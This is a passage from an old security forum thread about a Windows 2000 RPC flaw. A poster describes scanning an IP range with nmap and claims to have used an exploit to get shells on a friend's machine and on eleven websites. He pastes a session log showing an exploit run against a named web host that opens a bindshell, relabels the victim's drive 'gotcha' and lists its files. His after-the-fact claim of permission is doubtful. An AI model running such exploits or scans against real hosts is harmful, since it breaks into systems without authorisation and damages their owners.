Originally posted here by prodikal


True indeed, tedob1, but not all people are computer illiterate. Just out of curiosity I scanned my range with nmap, and out of 254 boxes there were only about 20 firewalled. I didn't try to get into any of the boxes, but IMO I would say at least 150 of those people would have been vulnerable.



Exactly, that's who it will affect: the public. Maybe ISPs should start emailing all their users, telling them of this new bug in Windows.



The code I posted will drop you into a shell with the rights of the person who is logged in. I tested it on a friend's machine and I had a shell in like 5 secs. I could tftp to it, upload whatever I wanted, and I could download any file I wanted as well. But until people realise about security there isn't much people can do.

To be honest, this code (it needs to be tweaked a bit first) is really scary and works. I've found 11 websites so far that have the vulnerability using this code, and all of "ADM FROM THOSE WEBSITES HAVE BEEN NOTIFIED" before "THE BAD GUYS GET THEM".
So this is just one example from one of those websites:
Code:
#./labexploits 4 www.kghyzt.com

-Target: [Win2k-]:www.kghyzt.com:135, Bindshell:666, RET=[0x0018759f]
 [+] Connected to bindshell.. 
 
 -- exploits penetration succesfully --
 
 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp. 
 
 C:\WINNT\system32>label gocha
 label gotcha
 
 C:\WINNT\system32>cd\ 
 cd\ 

 C:\>dir
 dir
 Volume in drive C is gotcha
 Volume Serial Number is 30A1-E843 
 
 Directory of C:\ 
 
 03/27/2003 12:11p <DIR> Backup 
 09/19/2002 05:24p <DIR> Documents and Settings 
 09/19/2002 05:18p <DIR> Inetpub 
 09/25/2002 05:30p <DIR> MDaemon 
 10/31/2002 11:55p <DIR> Program Files 
 09/19/2002 07:50p 600 PUTTY.RND 
 10/10/2002 10:49p <DIR> WINNT 
 1 File(s) 600 bytes 
 6 Dir(s) 7,899,820,032 bytes free 
 
 C:\>

PS: Yes, I do have permission to do penetration testing on those websites to prove that the code really works, BUT now I have stopped testing and I have moved on to do another thing (my assignment).